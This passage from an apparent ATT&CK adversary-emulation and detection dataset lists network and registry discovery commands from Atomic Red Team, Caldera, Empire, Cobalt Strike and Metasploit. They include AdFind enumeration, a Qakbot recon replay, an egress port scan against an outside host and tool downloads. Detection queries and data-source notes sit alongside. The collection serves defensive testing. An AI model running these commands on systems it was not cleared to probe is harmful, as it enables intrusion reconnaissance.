Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", + "name": "command_prompt" + } + }, + { + "name": "List Open Egress Ports", + "auto_generated_guid": "4b467538-f102-491d-ace7-ed487b853bf5", + "description": "This is to test for what ports are open outbound. The technique used was taken from the following blog:\nhttps://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/\n\nUpon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\\open-ports.txt.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path of file to write port scan results", + "type": "Path", + "default": "$env:USERPROFILE\\Desktop\\open-ports.txt" + }, + "portfile_url": { + "description": "URL to top-128.txt", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt" + }, + "port_file": { + "description": "The path to a text file containing ports to be scanned, one port per line. 
The default list uses the top 128 ports as defined by Nmap.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1016\\src\\top-128.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Test requires #{port_file} to exist\n", + "prereq_command": "if (Test-Path \"#{port_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"#{portfile_url}\" -OutFile \"#{port_file}\"\n" + } + ], + "executor": { + "command": "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "cleanup_command": "Remove-Item -ErrorAction ignore \"#{output_file}\"\n", + "name": "powershell" + } + }, + { + "name": "Adfind - Enumerate Active Directory Subnet Objects", + "auto_generated_guid": "9bb45dd7-c466-4f93-83a1-be30e56033ee", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. 
This example has been documented by ransomware actors enumerating Active Directory Subnet Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=subnet)\n", + "name": "command_prompt" + } + }, + { + "name": "Qakbot Recon", + "auto_generated_guid": "121de5c6-5818-4868-b8a7-8fd07c455c1b", + "description": "A list of commands known to be performed by Qakbot for recon purposes", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "recon_commands": { + "description": "File that houses list of commands to be executed", + "type": "Path", + "default": "PathToAtomicsFolder\\T1016\\src\\qakbot.bat" + } + }, + "executor": { + "command": "#{recon_commands}\n", + "name": "command_prompt" + } + }, + { + "name": "List macOS Firewall Rules", + "auto_generated_guid": "ff1d8c25-2aa4-4f18-a425-fede4a41ee88", + "description": "\"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. 
\n\nUsing `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\\\"Is it on or off?\\\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. \n\nUsing `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. \n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", + "name": "bash", + "elevation_required": true + } + } + ] + }, + { + "id": "14a21534-350f-4d83-9dd7-3c56b93a0c17", + "name": "Find Domain", + "description": "Find Domain information", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "nbtstat -n\n", + "parsers": { + "plugins.stockpile.app.parsers.nbtstat": [ + { + "source": "network.domain.name" + } + ] + } + } + } + } + }, + { + "id": "921055f4-5970-4707-909e-62f594234d91", + "name": "Remote Host Ping", + "description": "Ping a remote host to see if it is accessible", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "ping #{remote.host.fqdn}\n", + "parsers": { + "plugins.stockpile.app.parsers.firewallping": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "id": "9a30740d-3aa8-4c23-8efa-d51215e8a5b9", + "name": "Scan WIFI networks", + "description": "View all potential WIFI networks on host", + "tactic": 
"discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + "payloads": [ + "9f639067-370a-40ba-b7ac-6f1c15d5a158" + ] + } + }, + "linux": { + "sh": { + "command": "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + "payloads": [ + "9f639067-370a-40ba-b7ac-6f1c15d5a158" + ] + } + }, + "windows": { + "psh": { + "command": ".\\#{payload:28f9bf43-4f14-4965-9bd9-b70fd6993d8e} -Scan\n", + "payloads": [ + "28f9bf43-4f14-4965-9bd9-b70fd6993d8e" + ] + } + } + } + }, + { + "id": "a0676fe1-cd52-482e-8dde-349b73f9aa69", + "name": "Preferred WIFI", + "description": "See the most used WIFI networks of a machine", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "./wifi.sh pref\n", + "payloads": [ + "wifi.sh" + ], + "parsers": { + "plugins.stockpile.app.parsers.wifipref": [ + { + "source": "wifi.network.ssid" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "./wifi.sh pref\n", + "payloads": [ + "wifi.sh" + ], + "parsers": { + "plugins.stockpile.app.parsers.wifipref": [ + { + "source": "wifi.network.ssid" + } + ] + } + } + }, + "windows": { + "psh": { + "command": ".\\wifi.ps1 -Pref\n", + "payloads": [ + "wifi.ps1" + ], + "parsers": { + "plugins.stockpile.app.parsers.wifipref": [ + { + "source": "wifi.network.ssid" + } + ] + } + } + } + } + }, + { + "id": "ac9dce33-2acc-4b34-94ce-2596409ce8f0", + "name": "Ping network", + "description": "Ping the network in order to build the ARP cache", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "for ip in $(seq 190 199); do ping -c 1 $(echo #{domain.broadcast.ip} |\ncut -d. 
-f-3).$ip -W 1; done\n" + } + } + } + }, + { + "id": "b6f545ef-f802-4537-b59d-2cb19831c8ed", + "name": "Snag broadcast IP", + "description": "Capture the local network broadcast IP address", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ifconfig | grep broadcast" + } + } + } + }, + { + "id": "e8017c46-acb8-400c-a4b5-b3362b5b5baa", + "name": "Network Interface Configuration", + "description": "View network configuration info for host", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "sudo ifconfig\n" + } + }, + "linux": { + "sh": { + "command": "sudo ifconfig\n" + } + }, + "windows": { + "psh": { + "command": "ipconfig\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/dnsserver", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/dnsserver\": [\"T1016\"]," + }, + { + "Empire Module": "powershell/situational_awareness/host/get_proxy", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/get_proxy\": [\"T1016\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/arpscan", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/arpscan\": [\"T1016\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_subnet", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System 
Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_subnet\": [\"T1016\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"net.exe\"and file_directory contains \"config\")or (process_command_line contains \"ipconfig.exe\"or process_command_line contains \"netsh.exe\"or process_command_line contains \"arp.exe\"or process_command_line contains \"nbtstat.exe\")", + "name": "System Network Configuration Discovery" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell" + ], + [ + "5861", + "WMI" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5861", + "WMI" + ], + [ + "200-500", + " 4100-4104", + "PowerShell" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + 
"host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securelist.com/the-epic-turla-operation/65545/", + 
"https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + 
"https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1012", + "command_list": [ + "reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections ", + "shell reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections", + "reg queryval -k \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -v fDenyTSConnections\npost/windows/gather/enum_termserv", + "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nreg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKLM\\system\\currentcontrolset\\services /s | findstr ImagePath 2>nul | findstr /Ri \".*\\.sys$\"\nreg query 
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n", + "Get-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\n", + "cmd.exe reg (query|add)", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "powershell/situational_awareness/network/powerview/get_cached_rdpconnection" + ], + "commands": [ + { + "command": "reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections ", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": 
"Cobalt Strike" + }, + { + "command": "reg queryval -k \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -v fDenyTSConnections\npost/windows/gather/enum_termserv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nreg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKLM\\system\\currentcontrolset\\services /s | findstr ImagePath 2>nul | findstr /Ri \".*\\.sys$\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n", + "source": "atomics/T1012/T1012.yaml", + "name": "Atomic Red Team Test - Query Registry" + }, + { + "command": "Get-ItemProperty -Path 
HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\n", + "source": "data/abilities/discovery/2488245e-bcbd-405d-920e-2de27db882b3.yml", + "name": "Query Registry using PowerShell Get-ItemProperty" + }, + { + "command": "cmd.exe reg (query|add)", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "source": "Threat Hunting Tables", + 
"name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_cached_rdpconnection", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1012", + "Built-in Windows Command": "reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections ", + "Cobalt Strike": "shell reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections", + "Metasploit": "reg queryval -k \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -v fDenyTSConnections\npost/windows/gather/enum_termserv", + "Description": "Check for the current registry value for terminal services, if it's 0, then terminal services are enabled. 
If it's 1, then they're disabled" + }, + { + "attack_technique": "T1012", + "display_name": "Query Registry", + "atomic_tests": [ + { + "name": "Query Registry", + "auto_generated_guid": "8f7578c4-9863-4d83-875c-a565573bbdf0", + "description": "Query Windows Registry.\nUpon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).\nReferences:\nhttps://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order\nhttps://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services\nhttp://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf\nhttps://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nreg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg 
query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKLM\\system\\currentcontrolset\\services /s | findstr ImagePath 2>nul | findstr /Ri \".*\\.sys$\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "2488245e-bcbd-405d-920e-2de27db882b3", + "name": "Query Registry", + "description": "Query Registry using PowerShell Get-ItemProperty", + "tactic": "discovery", + "technique": { + "attack_id": "T1012", + "name": "Query Registry" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\n" + } + } + } + }, + { + "chain_id": "100148", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + 